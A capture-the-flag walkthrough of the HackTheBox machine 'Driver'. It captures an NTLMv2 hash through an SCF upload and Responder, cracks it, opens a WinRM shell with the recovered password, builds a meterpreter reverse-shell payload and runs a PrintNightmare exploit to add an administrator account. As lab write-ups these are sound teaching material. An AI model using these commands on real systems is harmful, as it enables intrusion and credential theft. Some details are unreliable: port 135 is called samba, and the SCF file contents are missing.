First, let's scan for open ports using
nmap. We can quickly scan for open ports and store them in a variable:
ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.106 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//). Then, we can scan those specific ports in depth by running
nmap's built-in scripts:
nmap -p$ports -sC -sV 10.10.11.106.
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_ Message signing enabled but not required
| date: 2022-02-19T11:40:18
|_ start_date: 2022-02-19T05:20:32
|_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m02s
Going to the website on port 80 gives an HTTP authentication dialogue box. Using the credentials
admin:adminto sign in works. There is a
fw_up.phppage where we can upload firmware, but there doesn't seem to be an accessible location where those files get uploaded to.
A directory bruteforce scan reveals nothing:
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.11.106/FUZZ.
According to HackTricks, "Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP... If WinRM is enabled on the machine, it's trivial to remotely administer the machine from PowerShell. In fact, you can just drop in to a remote PowerShell session on the machine (as if you were using SSH!)"
Under the WinRM connection in linux heading, HackTricks mentions using Hackplayers/evil-winrm. We need to have access credentials to use this protocol.
This leaves one port,
135, which is for samba. According to Wikipedia, "Server Message Block (SMB) is a communication protocol that Microsoft created for providing shared access to files and printers across nodes on a network." Since the other two ports look like dead ends for now, we must be able to find something here. Maybe the files are being uploaded to the samba share, which would mean we have write access to that share without authentication details.
Under this assumption, searching online for "smb unauthenticated write access exploit" reveals this post about SCF file attacks on SMB. Apparently, if SMB "is configured with write permissions for unauthenticated users then it is possible to obtain passwords hashes of domain users or Meterpreter shells."
On the HackTricks post about WinRM there is a subheading called "Pass the hash with evil-winrm." So, if we can get a hash with an SCF attack we can pass the hash and get a user shell with
Searching for "SMB SCF file exploit" shows these additional results: sql--injection.blogspot.com and 1337red.wordpress.com.
Essentially, an SCF file is used to control Windows Explorer. So, when a user browses to a folder containing an SCF file, Windows will use the contents of that file. We can create an SCF file like this:
We can set
X.X.X.Xto our attacker's ip address. Since the
IconFilefield is set to a UNC path, Windows will request the icon from the attacker and try authenticating with the user's credentials, then the attack will issue a challenge request, finally Windows will return a challenge response with the NTLM hash.
Then, we upload the following SCF file using the firmware upload page (
fw_up.php) on port 80.
Responder outputs the following:
[SMB] NTLMv2 Client : ::ffff:10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash : tony::DRIVER:566dd632a8e52118:AA64BDEA4F87F24A42C8CDFA48DF7780:0101000000000000FA685E0C8F25D801E8816037B7647BED00000000020000000000000000000000
We have our NTLM hash!
We can crack this hash with
hashcat. We first find the
hashcatmode needed for NTLMv2 hashes with
hashcat --help | grep NTLMv2, which shows us the correct mode is
So, we paste the hash into a file called
hashand then run
hashcat -a 0 -m 5600 hash rockyou.txt:
The password is
According to HackTricks, we can use
evil-winrm -u <username> -p <password> -i <IP>. Let's connect with the
tonyuser like so:
evil-winrm -u tony -p liltony -i 10.10.11.106.
We get a shell on the machine! Now, we can get the
Let's upload WinPEAS to scan for ways to gain privileges. Since we are using
evil-winrmwe can simply run the
upload /home/kali/Downloads/winPEASx64.exe. We can run it with
.\winPEASx64.exe. This doesn't give any easy wins.
To get a metasploit shell run the following on the attacker:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f exe > e.exe
set payload windows/meterpreter/reverse_tcp
set LHOST tun0
evil-winrmon the target run:
upload e.exeand then
Then, back in the meterpreter, run
backgroundto get mack the the
msfconsole. Then run
use post/multi/recon/local_exploit_suggesterand set the session with
set session 1then
runto get a list of possible exploits. This reveals nothing.
So, the actual exploit that should be used is
CVE-2021-34527, or PrintNightmare. After enough searching one may find this exploit because the
spoolsvservice is running as shown in WinPEAS's "Current TCP Listening Ports" output (and when simply running
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 0.0.0.0 80 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 135 0.0.0.0 0 Listening 708 svchost
TCP 0.0.0.0 445 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 5985 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 47001 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 49408 0.0.0.0 0 Listening 464 wininit
TCP 0.0.0.0 49409 0.0.0.0 0 Listening 868 svchost
TCP 0.0.0.0 49410 0.0.0.0 0 Listening 844 svchost
TCP 0.0.0.0 49411 0.0.0.0 0 Listening 1176 spoolsv
TCP 0.0.0.0 49412 0.0.0.0 0 Listening 572 services
TCP 0.0.0.0 49413 0.0.0.0 0 Listening 580 lsass
TCP 10.10.11.106 139 0.0.0.0 0 Listening 4 System
TCP 10.10.11.106 445 10.10.14.78 36684 Established 4 System
TCP 10.10.11.106 5985 10.10.14.32 59202 Time Wait 0 Idle
TCP 10.10.11.106 5985 10.10.14.32 59204 Established 4 System
0xdf's article "Playing with PrintNightmare" is a great tutorial on how to exploit this vulnerability. Invoke-Nightmare, a PowerShell script developed by Caleb Stewart and John Hammond, is the most simple to use PrintNightmare exploit.
We can download the exploit to our attacker machine with
wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1and then upload it to the target with our
evil-winrmconnection by running
upload CVE-2021-1675.ps1. Then, run
set-ExecutionPolicy RemoteSigned -Scope CurrentUserso you don't get the "execution of scripts is disabled on this system" error message (StackOverflow answer where command was found). Now, we can launch the exploit:
Invoke-Nightmare -NewUser "john" -NewPassword "SuperSecure"
Originally, I saw the
[!] failed to get current driver listerror message, but after resetting the box it worked:
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
Now, all we have to do is connect with
evil-winrmas our newly created administrator
evil-winrm -u john -p SuperSecure -i 10.10.11.106. We can get the